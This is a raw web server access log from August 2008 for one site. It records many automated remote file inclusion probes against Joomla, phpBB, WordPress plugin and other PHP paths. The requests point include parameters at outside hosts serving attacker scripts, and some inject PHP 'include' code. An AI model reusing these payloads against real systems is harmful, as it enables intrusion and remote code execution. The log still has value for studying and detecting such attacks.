132.229.91.22 - - [10/Aug/2008:11:00:57 -0700] "GET /logs/access_080714.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:00:57 -0700] "GET /logs/access_080321.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:00:57 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18481 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:00:58 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:11:01:08 -0700] "GET /logs/access_080302.log/addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:01:17 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:01:21 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:01:30 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:01:30 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:01:39 -0700] "GET /logs/access_080123.log//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:01:41 -0700] "GET //index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 200 18357 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:02:03 -0700] "GET //index2.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:02:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:02:06 -0700] "GET /phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:02:10 -0700] "GET /logs/access_080123.log//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:02:11 -0700] "GET //index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 200 18357 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:02:12 -0700] "GET /logs//index.php?lang=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:03:00 -0700] "GET /index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:03:11 -0700] "GET /logs/access_080226.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:03:11 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18483 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:03:11 -0700] "GET /logs/access_071227.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:03:11 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:03:22 -0700] "GET //index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:04:02 -0700] "GET /logs/access_080309.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:04:21 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:04:50 -0700] "GET /logs/access_071222.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:04:59 -0700] "GET /logs/access_080714.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:05:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18477 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:05:00 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:11:05:18 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:11:05:21 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18585 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:05:23 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:05:25 -0700] "GET /logs/access_080724.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:11:05:32 -0700] "GET /logs/index2.php?s=http://www.tsg-ringen-herdecke.de/blog//textpattern/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:11:05:33 -0700] "GET /index2.php?s=http://www.tsg-ringen-herdecke.de/blog//textpattern/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:06:10 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:06:10 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:06:17 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:06:17 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
209.25.195.72 - - [10/Aug/2008:11:06:19 -0700] "GET /logs/index.php?headfoot=yes&path[docroot]=http://student-x.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:06:20 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18479 "-" "libwww-perl/5.76" "www.dmulk.com"
209.25.195.72 - - [10/Aug/2008:11:06:21 -0700] "GET /index.php?headfoot=yes&path[docroot]=http://student-x.com/test.txt?? HTTP/1.1" 200 18441 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:06:21 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:06:21 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:06:28 -0700] "GET /logs/errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:06:28 -0700] "GET /errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:06:33 -0700] "GET /logs/access_080724.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:48 -0700] "GET /logs/access_080315.log//?commonpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:49 -0700] "GET /logs/access_080315.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:50 -0700] "GET //?commonpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18371 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:51 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:51 -0700] "GET /logs//?commonpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 60002 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:11:06:52 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:07:27 -0700] "GET //phpkit/popup.php?path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:07:27 -0700] "GET /logs//phpkit/popup.php?path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:11:07:28 -0700] "GET //phpkit/popup.php?path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:11:07:28 -0700] "GET /logs//phpkit/popup.php?path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:07:51 -0700] "GET /logs/access_071222.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:11:08:08 -0700] "GET /logs/access_071222.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:08:16 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:08:19 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:08:19 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:08:21 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18633 "-" "libwww-perl/5.79" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:08:29 -0700] "GET /logs/access_080227.log//include.php?path%5Bdocroot%5D=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:08:34 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:08:41 -0700] "GET /logs/access_080209.log//index.php?lang=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:08:41 -0700] "GET /logs//index.php?lang=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:08:44 -0700] "GET //index.php?lang=http://www.ecolnet.org/response.txt???? HTTP/1.1" 200 18407 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.131.81 - - [10/Aug/2008:11:09:40 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.103.131.81 - - [10/Aug/2008:11:09:41 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 18535 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
63.148.136.52 - - [10/Aug/2008:11:10:12 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:11:11:49 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:11:11:50 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 18589 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:11:53 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:12:47 -0700] "GET /logs/access_080226.log//index.php?lang=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:11:13:10 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:11:13:10 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:11:13:10 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:13:19 -0700] "GET /logs/access_080209.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:13:21 -0700] "GET //index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:13:22 -0700] "GET /logs//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:11:14:30 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:11:14:30 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:11:14:31 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:11:14:31 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:14:32 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:14:32 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:11:14:35 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:14:50 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:14:50 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:14:51 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:14:51 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:11:14:52 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:15:01 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:15:07 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:15:13 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:15:26 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:15:26 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:15:32 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:15:32 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:11:16:05 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [10/Aug/2008:11:16:08 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18597 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:17:31 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:17:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:17:39 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:17:41 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18629 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:17:42 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
